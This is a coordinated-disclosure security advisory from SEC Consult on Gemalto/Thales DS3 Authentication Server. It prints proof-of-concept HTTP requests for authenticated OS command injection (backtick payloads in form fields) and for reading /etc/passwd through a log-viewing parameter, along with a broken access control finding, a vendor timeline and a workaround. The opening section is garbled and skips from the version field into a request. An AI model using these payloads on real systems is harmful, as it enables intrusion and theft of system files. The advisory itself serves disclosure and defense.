SEC Consult Vulnerability Lab Security Advisory < 20190509-0 > ======================================================================= title: Multiple Vulnerabilities product: Gemalto (Thales Group) DS3 Authentication Server / Ezio Server vulnerable version: Ezio DS3 server Content-Type: application/x-www-form-urlencoded Content-Length: 132 CSRFTOKEN=&HOST_NAME=127.0.0.1`whoami`&PORT_NUMBER=8443&TEST_RESULTS=%0D%0A%09%09%09%09%09%09 ######################################################################## HTTP/1.1 200 OK Strict-Transport-Security: max-age=31536000;includeSubDomains X-Frame-Options: SAMEORIGIN Content-Type: text/html;charset=utf-8 Server: DS3-AuthServer Content-Length: 12987 ... ... ######################################################################## The complex bash command payload without any space (' '/%20) representing "ls -1 | tail -1" injected into the "PORT_NUMBER" parameter and the HTTP response with the result of the payload "liquibase.out" mixed in. Please note that the OS command payload is enclosed with the `` characters. ######################################################################## POST /ServerAdmin/TestTelnetConnection.jsp HTTP/1.1 Host: $IP Cookie: JSESSIONID= Content-Type: application/x-www-form-urlencoded Content-Length: 173 CSRFTOKEN=&HOST_NAME=127.0.0.1&PORT_NUMBER=8443`CMD1=$'\x20-1';CMD2=$'\x20-1';ls$CMD1|tail$CMD2`&TEST_RESULTS=%0D%0A%09%09%09%09%09%09 ######################################################################## HTTP/1.1 200 OK Strict-Transport-Security: max-age=31536000;includeSubDomains X-Frame-Options: SAMEORIGIN Content-Type: text/html;charset=utf-8 Server: DS3-AuthServer Content-Length: 13159 ... ... ######################################################################## 2) Limited Local File Disclosure (LFD) (Post-authenticated) (CVE-2019-9157) This POC was performed using an admin user with the "dsssAdmin" group permission, as the "ADMINISTRATION -> Log Manager -> View Log -> Tail Logs Utility" function is not accessible to users with the "READ_ONLY" group permission. This exploit has the following two restrictions: 1) Only the last 10 lines of the file are displayed. 2) Directory traversal was not allowed, as the parameter cannot contain two dot (.) characters. However, the tester was able to bypass the directory traversal restriction by injecting the arbitrary filename as another argument, rather than to modify the first argument. The file "/etc/passwd" injected into the "LOG_TYPE" parameter and the response with the last 10 lines of the file returned. Please note that the injected filename is preceded with the + character. ######################################################################## GET /ServerAdmin/TailLogs.jsp?LOG_TYPE=+/etc/passwd&KEYWORD_FILTER=&REFRESH_RATE=5&TAIL_LINE=0&CSRFTOKEN= HTTP/1.1 Host: $IP Cookie: JSESSIONID= ######################################################################## HTTP/1.1 200 OK Strict-Transport-Security: max-age=31536000;includeSubDomains X-Frame-Options: SAMEORIGIN Content-Type: text/html;charset=utf-8 Content-Length: 3702 Server: DS3-AuthServer ... ... ######################################################################## 3) Broken Access Control (Post-authenticated) (CVE-2019-9158) The admin user with the "dsssAdmin" group permission is able to access the following chain of functions in the menu of the web portal. * ADMINISTRATION -> Log Manager -> View Log * ADMINISTRATION -> Log Manager -> View Log -> Tail Logs Utility The user with the "READ_ONLY" group permission is not able to access the following chain of function in the menu of the web portal. * ADMINISTRATION -> Log Manager -> View Log Based on the web portal, a user with the "READ_ONLY" group permission should also not be able to access the following chain of function. * ADMINISTRATION -> Log Manager -> View Log -> Tail Logs Utility However, it was noted that a user with the "READ_ONLY" group permission is able to access the "Tail Logs Utility" function with the GET request (captured from the "dsssAdmin" user's request) directly with the "READ_ONLY" user's session cookie and CSRFTOKEN token. https://$IP/ServerAdmin/TailLogs.jsp?LOG_TYPE=audit.log&KEYWORD_FILTER=&REFRESH_RATE=5&TAIL_LINE=392154&CSRFTOKEN= ******************************************************************************** Vulnerable / tested versions: ----------------------------- The following version has been tested and found to be vulnerable: * 2.6.1-SP01 The following version was confirmed to be vulnerable by the vendor: * All versions earlier than v3.1.0 Vendor contact timeline: ------------------------ 2019-02-27: Contacting vendor through csirt@gemalto.com (Gemalto CERT) 2019-03-08: Gemalto CERT confirmed the vulnerabilities for DS3/Ezio Server version 2.8.0-update01 and earlier. Requested 2 months disclosure embargo period to implement fix for future release. 2019-03-22: Gemalto CERT confirmed the fix for the reported vulnerabilities to be included in current sprint and provided CVSSv3 scoring and CWE assigned. 2019-03-22: Provided Gemalto CERT with attacker-centric CVSSv3 metrics. 2019-04-05: Gemalto CERT provided updated CVSSv3 metrics. 2019-04-18: Gemalto CERT informed that the fix for the 3 vulnerabilities was planned in the upcoming of Ezio DS3 server v3.1.0 release by 1st week of May, and asked for extension of embargo period. Furthermore, Gemalto is now part of the Thales Group. 2019-05-06: Patches available 2019-05-09: Coordinated release of security advisory Solution: --------- According to the vendor the patches are provided to the Support Team L2 and Professional Services team and those teams will get in touch with the technical contacts of the customers. The update will also be announced via a future newsletter. Furthermore, SEC Consult have been informed that the branch 2.x of Ezio DS3 server is not fixed yet and a patch will be available at a later date. However, customers are reminded about deployment guidelines to reduce their attack surface. Workaround: ----------- As the vulnerabilities need authentication with valid credentials to the portal, it is recommended to deploy the application in a trusted zone and should be restricted to the customer's internal secure network. Advisory URL: ------------- https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/career/index.html Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/contact/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF TING Meng Yean / @2019